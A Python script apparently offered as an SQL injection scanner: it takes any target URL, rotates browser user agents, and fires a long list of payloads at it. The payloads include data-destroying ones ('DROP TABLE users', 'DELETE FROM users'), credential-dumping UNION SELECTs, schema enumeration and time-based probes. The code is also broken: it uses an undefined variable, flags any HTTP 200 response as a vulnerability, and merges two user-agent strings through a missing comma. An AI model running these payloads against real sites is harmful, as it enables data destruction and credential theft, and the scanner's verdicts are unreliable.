import sys
try:
    import requests
except ImportError:
    print("The 'requests' module is not found.")
    response = input("Do you want to install it? (y/n): ")
    if response.lower() == 'y':
        try:
            import pip
        except ImportError:
            print("Could not find 'pip' package installer. Please install it manually.")
            sys.exit(1)

        try:
            import subprocess
            subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'requests'])
            print("'requests' module has been installed successfully.")
        except Exception as e:
            print("An error occurred while installing 'requests' module:", str(e))
            sys.exit(1)
    else:
        print("Please install the 'requests' module to run this script.")
        sys.exit(1)

import requests
import random

def check_sql_injection(target_url):
    payloads = [
        # Existing payloads
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' OR '1'='1' #",
        "admin' --",
        "admin' #",
        "1; DROP TABLE users",
        "1' OR '1'='1'; DROP TABLE users",
        "1' OR '1'='1'; DELETE FROM users",
        "' UNION SELECT username, password FROM users",
        "' UNION SELECT NULL, CONCAT(username, ':', password) FROM users",
        "' UNION SELECT table_name, column_name FROM information_schema.columns",
        "' UNION SELECT NULL, CONCAT(table_name, ':', column_name) FROM information_schema.columns",
        "' OR 1=1 -- -",
        "' OR 'a'='a' -- -",
        "' OR 1=1 LIMIT 1 -- -",
        "' OR 'a'='a' LIMIT 1 -- -",
        "' OR 'a'='a' UNION SELECT NULL, version() -- -",
        "' OR 'a'='a' UNION SELECT NULL, database() -- -",
        "' OR 'a'='a' UNION SELECT NULL, user() -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@version_compile_os -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@hostname -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@datadir -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@basedir -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@secure_file_priv -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@character_set_server -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@collation_server -- -",
        "' OR 'a'='a' UNION SELECT NULL, @@sql_mode -- -",
        "' OR 'a'='a' UNION SELECT NULL, (SELECT CONCAT(username, ':', password) FROM users LIMIT 1) -- -",
        "' OR 'a'='a' UNION SELECT NULL, (SELECT COUNT(*) FROM information_schema.tables) -- -",
        "' OR 'a'='a' UNION SELECT NULL, (SELECT TABLE_NAME FROM information_schema.tables LIMIT 1) -- -",
        "' OR 'a'='a' UNION SELECT NULL, (SELECT CONCAT(TABLE_NAME, ':', COLUMN_NAME) FROM information_schema.columns LIMIT 1) -- -",
        # Additional payloads
        "'", "''",
        "`", "``",
        ",", "\"\"",
        "/", "//",
        "\\", "\\\\",
        ";", "' or \"",
        "--", "#",
        "' OR '1",
        "' OR 1 -- -",
        "\" OR \"\" = \"",
        "\" OR 1 = 1 -- -",
        "' OR '' = '",
        "'='",
        "'LIKE'",
        "=0--+",
        " OR 1=1",
        "' OR 'x'='x",
        "' AND id IS NULL; --",
        "'''''''''''''UNION SELECT '2",
        "%00",
        "/*…*/",
        "+",
        "||",
        "%",
        "@variable",
        "@@variable",
        "#",
        "-- -",
        ";WAITFOR DELAY '0:0:30'--",
        "#",
        "/*",
        "-- -",
        ";%00",
        "`",
        "' OR 1=1",
        "' OR 1=0",
        "' OR x=x",
        "' OR x=y",
        "' OR 1=1#",
        "' OR 1=0#",
        "' OR x=x#",
        "' OR x=y#",
        "' OR 1=1--",
        "' OR 1=0--",
        "' OR x=x--",
        "' OR x=y--",
        "' OR 3409=3409 AND ('pytW' LIKE 'pytW",
        "' OR 3409=3409 AND ('pytW' LIKE 'pytY",
        "HAVING 1=1",
        "HAVING 1=0",
        "HAVING 1=1#",
        "HAVING 1=0#",
        "HAVING 1=1--",
        "HAVING 1=0--",
        "AND 1=1",
        "AND 1=0",
        "AND 1=1--",
        "AND 1=0--",
        "AND 1=1#",
        "AND 1=0#",
        "AND 1=1 AND '%'='",
        "AND 1=0 AND '%'='",
        "AND 1083=1083 AND (1427=1427",
        "AND 7506=9091 AND (5913=5913",
        "AND 1083=1083 AND ('1427=1427",
        "AND 7506=9091 AND ('5913=5913",
        "AND 7300=7300 AND 'pKlZ'='pKlZ",
        "AND 7300=7300 AND 'pKlZ'='pKlY",
        "AND 7300=7300 AND ('pKlZ'='pKlZ",
        "AND 7300=7300 AND ('pKlZ'='pKlY",
        "AS INJECTX WHERE 1=1 AND 1=1",
        "AS INJECTX WHERE 1=1 AND 1=0",
        "AS INJECTX WHERE 1=1 AND 1=1#",
        "AS INJECTX WHERE 1=1 AND 1=0#",
        "AS INJECTX WHERE 1=1 AND 1=1--",
        "AS INJECTX WHERE 1=1 AND 1=0--",
        "WHERE 1=1 AND 1=1",
        "WHERE 1=1 AND 1=0",
        "WHERE 1=1 AND 1=1#",
        "WHERE 1=1 AND 1=0#",
        "WHERE 1=1 AND 1=1--",
        "WHERE 1=1 AND 1=0--",
        "ORDER BY 1--",
        "ORDER BY 2--",
        "ORDER BY 3--",
        "ORDER BY 4--",
        "ORDER BY 5--",
        "ORDER BY 6--",
        "ORDER BY 7--",
        "ORDER BY 8--",
        "ORDER BY 9--",
        "ORDER BY 10--",
        "ORDER BY 11--",
        "ORDER BY 12--",
        "ORDER BY 13--",
        "ORDER BY 14--",
        "ORDER BY 15--",
        "ORDER BY 16--",
        "ORDER BY 17--",
        "ORDER BY 18--",
        "ORDER BY 19--",
        "ORDER BY 20--",
        "ORDER BY 21--",
        "ORDER BY 22--",
        "ORDER BY 23--",
        "ORDER BY 24--",
        "ORDER BY 25--",
        "ORDER BY 26--",
        "ORDER BY 27--",
        "ORDER BY 28--",
        "ORDER BY 29--",
        "ORDER BY 30--",
        "ORDER BY 31337--",
        "ORDER BY 1#",
        "ORDER BY 2#",
        "ORDER BY 3#",
        "ORDER BY 4#",
        "ORDER BY 5#",
        "ORDER BY 6#",
        "ORDER BY 7#",
        "ORDER BY 8#",
        "ORDER BY 9#",
        "ORDER BY 10#",
        "ORDER BY 11#",
        "ORDER BY 12#",
        "ORDER BY 13#",
        "ORDER BY 14#",
        "ORDER BY 15#",
        "ORDER BY 16#",
        "ORDER BY 17#",
        "ORDER BY 18#",
        "ORDER BY 19#",
        "ORDER BY 20#",
        "ORDER BY 21#",
        "ORDER BY 22#",
        "ORDER BY 23#",
        "ORDER BY 24#",
        "ORDER BY 25#",
        "ORDER BY 26#",
        "ORDER BY 27#",
        "ORDER BY 28#",
        "ORDER BY 29#",
        "ORDER BY 30#",
        "ORDER BY 31337#",
        "ORDER BY 1",
        "ORDER BY 2",
        "ORDER BY 3",
        "ORDER BY 4",
        "ORDER BY 5",
        "ORDER BY 6",
        "ORDER BY 7",
        "ORDER BY 8",
        "ORDER BY 9",
        "ORDER BY 10",
        "ORDER BY 11",
        "ORDER BY 12",
        "ORDER BY 13",
        "ORDER BY 14",
        "ORDER BY 15",
        "ORDER BY 16",
        "ORDER BY 17",
        "ORDER BY 18",
        "ORDER BY 19",
        "ORDER BY 20",
        "ORDER BY 21",
        "ORDER BY 22",
        "ORDER BY 23",
        "ORDER BY 24",
        "ORDER BY 25",
        "ORDER BY 26",
        "ORDER BY 27",
        "ORDER BY 28",
        "ORDER BY 29",
        "ORDER BY 30",
        "ORDER BY 31337",
        "RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
        "RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
        "IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--",
        "IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--",
        "' AND 8310=8310 AND '%'='",
        "' AND 8310=8311 AND '%'='",
        " and (select substring(@@version,1,1))='X'",
        " and (select substring(@@version,1,1))='M'",
        " and (select substring(@@version,2,1))='i'",
        " and (select substring(@@version,2,1))='I'",
        " and (select substring(@@version,3,1))='c'",
        " and (select substring(@@version,3,1))='C'",
        " and (select substring(@@version,4,1))='r'",
        " and (select substring(@@version,4,1))='R'",
        " and (select substring(@@version,5,1))='o'",
        " and (select substring(@@version,5,1))='O'",
        " and (select substring(@@version,6,1))='s'",
        " and (select substring(@@version,6,1))='S'",
        " and (select substring(@@version,7,1))='o'",
        " and (select substring(@@version,7,1))='O'",
        " and (select substring(@@version,8,1))='f'",
        " and (select substring(@@version,8,1))='F'",
        " and (select substring(@@version,9,1))='t'",
        " and (select substring(@@version,9,1))='T'",
        " and (select substring(@@version,10,1))=''",
        " and (select substring(@@version,10,1))=''",
        " and (select substring(@@version,11,1))='",
        " and (select substring(@@version,11,1))='",
        " and (select substring(@@version,12,1))='2'",
        " and (select substring(@@version,12,1))='2'",
        " and (select substring(@@version,13,1))='0'",
        " and (select substring(@@version,13,1))='0'",
        " and (select substring(@@version,14,1))='0'",
        " and (select substring(@@version,14,1))='0'",
        " and (select substring(@@version,15,1))='",
        " and (select substring(@@version,15,1))='",
        " and (select substring(@@version,16,1))='2'",
        " and (select substring(@@version,16,1))='2'",
        " and (select substring(@@version,17,1))='",
        " and (select substring(@@version,17,1))='",
        " and (select substring(@@version,18,1))='0'",
        " and (select substring(@@version,18,1))='0'",
        " and (select substring(@@version,19,1))=''",
        " and (select substring(@@version,19,1))=''",
        " and (select substring(@@version,20,1))='",
        " and (select substring(@@version,20,1))='",
        " and (select substring(@@version,21,1))=''",
        " and (select substring(@@version,21,1))=''",
        " and (select substring(@@version,22,1))='",
        " and (select substring(@@version,22,1))='",
        " and (select substring(@@version,23,1))='6'",
        " and (select substring(@@version,23,1))='6'",
        " and (select substring(@@version,24,1))=''",
        " and (select substring(@@version,24,1))=''",
        " and (select substring(@@version,25,1))='4'",
        " and (select substring(@@version,25,1))='4'",
        " and (select substring(@@version,26,1))=''",
        " and (select substring(@@version,26,1))=''",
        " and (select substring(@@version,27,1))='2'",
        " and (select substring(@@version,27,1))='2'",
        " and (select substring(@@version,28,1))=''",
        " and (select substring(@@version,28,1))=''",
        " and (select substring(@@version,29,1))='2'",
        " and (select substring(@@version,29,1))='2'",
        " and (select substring(@@version,30,1))=''",
        " and (select substring(@@version,30,1))=''",
        " and (select substring(@@version,31,1))=''",
        " and (select substring(@@version,31,1))=''",
        " and (select substring(@@version,32,1))=''",
        " and (select substring(@@version,32,1))=''",
        " and (select substring(@@version,33,1))=''",
        " and (select substring(@@version,33,1))=''",
        " and (select substring(@@version,34,1))=''",
        " and (select substring(@@version,34,1))=''",
        " and (select substring(@@version,35,1))=''",
        " and (select substring(@@version,35,1))=''",
        " and (select substring(@@version,36,1))=''",
        " and (select substring(@@version,36,1))=''",
        " AND 1=1 AND '%'='",
        " AND 1=1 AND '%'='",
        " AND 1=0 AND '%'='",
        " AND 1=0 AND '%'='",
        " AND 8310=8310 AND '",
        " AND 8310=8311 AND '",
        " AND 6741=6741 AND (5154=5154",
        " AND 6741=6741 AND (5154=5155",
        " AND 6741=6741 AND ('5154=5154",
        " AND 6741=6741 AND ('5154=5155",
        " OR 1=1 AND '%'='",
        " OR 1=1 AND '%'='",
        " OR 1=0 AND '%'='",
        " OR 1=0 AND '%'='",
        " OR 8767=8767 AND '",
        " OR 8767=8768 AND '",
        " OR 8767=8767 AND ('",
        " OR 8767=8768 AND ('",
        " AND 4421=4421 AND 'xyz'='xyz",
        " AND 4421=4422 AND 'xyz'='xyz",
        " AND 4421=4421 AND ('xyz'='xyz",
        " AND 4421=4422 AND ('xyz'='xyz",
        " AND 6584=6584 AND 'sXik'='sXik",
        " AND 6584=6585 AND 'sXik'='sXik",
        " AND 6584=6584 AND ('sXik'='sXik",
        " AND 6584=6585 AND ('sXik'='sXik",
        " OR 1=1--",
        " OR 1=0--",
        " OR 1=1#",
        " OR 1=0#",
        " OR 1=1/*",
        " OR 1=0/*",
        " OR 1=1;%00",
        " OR 1=0;%00",
        " OR 1=1;%00",
        " OR 1=0;%00",
        "'; EXEC sp_executesql N'SELECT * FROM information_schema.tables WHERE table_name LIKE ''%'', N''@name nvarchar(100)', 'admin'--",
        "'; EXEC sp_executesql N'SELECT * FROM information_schema.tables WHERE table_name LIKE ''%'', N''@name nvarchar(100)', 'admin'--",
        "'; EXEC sp_executesql N'SELECT * FROM information_schema.tables WHERE table_name LIKE ''%'', N''@name nvarchar(100)', 'admin'--",
        "'; EXEC sp_executesql N'SELECT * FROM information_schema.tables WHERE table_name LIKE ''%'', N''@name nvarchar(100)', 'admin'--",
        "'; WAITFOR DELAY '0:0:10'--",
        "'; WAITFOR DELAY '0:0:10'--",
        "'; WAITFOR DELAY '0:0:10'--",
        "'; WAITFOR DELAY '0:0:10'--",
        "'; SELECT CASE WHEN (1=1) THEN 'a' ELSE 'b' END--",

    ]

    user_agents = [
        # Existing user agents
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472. ",
        # Additional user agents
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/89.0",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/88.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/89.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/88.0"
        # Add more user agents here as per your testing needs
    ]

    headers = {
        "User-Agent": random.choice(user_agents),
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close"
    }

    for payload in payloads:
        url = target_url + payload
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            print(f"Payload: {payload} - SQL Injection Vulnerability Detected!")
        else:
            print(f"Payload: {payload} - No SQL Injection Vulnerability Detected.")


# Prompt the user for the target URL
# URL of the target system
target_url = input("Enter the target URL: ")

try:
    # Send a GET request to the target URL
    response = requests.get(url)

    # Check the response status code
    if response.status_code == 200:
        print("Connection successful.")
        # Your SQL injection vulnerability scanning code goes here
        # ...
    else:
        print("Error: Failed to connect to the target URL. Status code:", response.status_code)

except requests.exceptions.RequestException as e:
    print("Error: An exception occurred during the request:", str(e))

except Exception as e:
    print("Error: An unexpected error occurred:", str(e))

check_sql_injection(target_url)

